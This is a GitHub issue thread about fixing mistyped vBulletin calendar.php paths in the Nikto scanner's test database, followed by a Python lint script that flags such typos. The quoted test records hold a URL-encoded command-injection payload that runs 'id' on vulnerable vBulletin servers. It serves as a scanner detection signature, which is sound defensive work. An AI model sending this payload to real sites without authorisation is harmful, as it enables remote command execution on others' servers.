Closed ghost closed 8 years ago
I'm guessing you are correct all around. Not sure where "vbcalendar.php" came from but... seems wrong.
On Tue, Jun 14, 2016 at 9:01 AM, RealRancor notifications@github.com wrote:
I'm not quite sure but those:
"003039","3299","8","/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003040","3299","8","/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003041","3299","8","/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003042","3299","8","@VBULLETINvbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003043","3299","8","@VBULLETINvbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003044","3299","8","@CGIDIRScalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","
The advisories are mostly just referring to calendar.php:
https://www.exploit-db.com/exploits/21874/
http://www.securityfocus.com/bid/5820/exploit
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1660
so probably they should be:
/forumscalendar.php -> /forums/calendar.php
/forumzcalendar.php -> /forumz/calendar.php
/htforumcalendar.php -> /htforum/calendar.php
@VBULLETINvbcalendar.php and @VBULLETINvbulletincalendar.php -> @VBULLETINcalendar.php
Any opinions about this?
I think I found the issue. vbcalendar.php and vbulletincalendar.php probably should have been /vb/calendar.php and /vbulletin/calendar.php.
Just created a PR with a possible fix: https://github.com/sullo/nikto/pull/388
I'm not quite sure but most of those:
are looking like typos to me.
The advisories are mostly just referring to calendar.php:
https://www.exploit-db.com/exploits/21874/
http://www.securityfocus.com/bid/5820/exploit
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1660
so probably they should be:
/forumscalendar.php -> /forums/calendar.php
/forumzcalendar.php -> /forumz/calendar.php
/htforumcalendar.php -> /htforum/calendar.php
@VBULLETINvbcalendar.php and @VBULLETINvbulletincalendar.php -> @VBULLETINcalendar.php
Any opinions about this?
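A lint pass for the kind of typo discussed in this thread, as an added example that is not code from Nikto or from the PR: it scans db_tests-style records for a URI whose last path segment has a directory name fused onto calendar.php. The sample records are constructed (query strings shortened, test id 900001 invented), and treating an @VARIABLE prefix as expanding to a directory path that ends in a slash is an assumption.

```python
import csv
import io
import re

# Constructed sample in the column layout quoted in the thread
# (id, ref, tuning, uri, method, match, ...). Query strings are shortened.
SAMPLE = '''"003039","3299","8","/forumscalendar.php?calbirthdays=1&action=getday","GET","uid=","","","","","Vbulletin allows remote command execution.","",""
"003042","3299","8","@VBULLETINvbcalendar.php?calbirthdays=1&action=getday","GET","uid=","","","","","Vbulletin allows remote command execution.","",""
"003044","3299","8","@CGIDIRScalendar.php?calbirthdays=1&action=getday","GET","uid=","","","","","Vbulletin allows remote command execution.","",""
"900001","0","8","/forums/calendar.php?calbirthdays=1&action=getday","GET","uid=","","","","","constructed, already well-formed","",""
'''

# Assumption: a leading @UPPERCASE token is a scanner variable that expands
# to a directory path ending in "/", so it is not part of the file name.
VAR_PREFIX = re.compile(r"^@[A-Z0-9_]+")


def find_fused(db_text, script="calendar.php"):
    """Return (test_id, path, fused_prefix) for URIs whose last path
    segment ends with `script` but carries extra leading characters."""
    findings = []
    for row in csv.reader(io.StringIO(db_text)):
        # Skip blank lines, short rows and comment lines.
        if len(row) < 4 or row[0].startswith("#"):
            continue
        test_id, uri = row[0], row[3]
        path = uri.split("?", 1)[0]                  # drop the query string
        segment = VAR_PREFIX.sub("", path).rsplit("/", 1)[-1]
        # Heuristic: "forumscalendar.php" is suspicious, "calendar.php" is not.
        # A file genuinely named e.g. "vbcalendar.php" would also be flagged,
        # so every finding needs a check against the advisory.
        if segment != script and segment.endswith(script):
            findings.append((test_id, path, segment[: -len(script)]))
    return findings


if __name__ == "__main__":
    for test_id, path, prefix in find_fused(SAMPLE):
        print(f"{test_id}: {path} (possible missing '/' after '{prefix}')")
```
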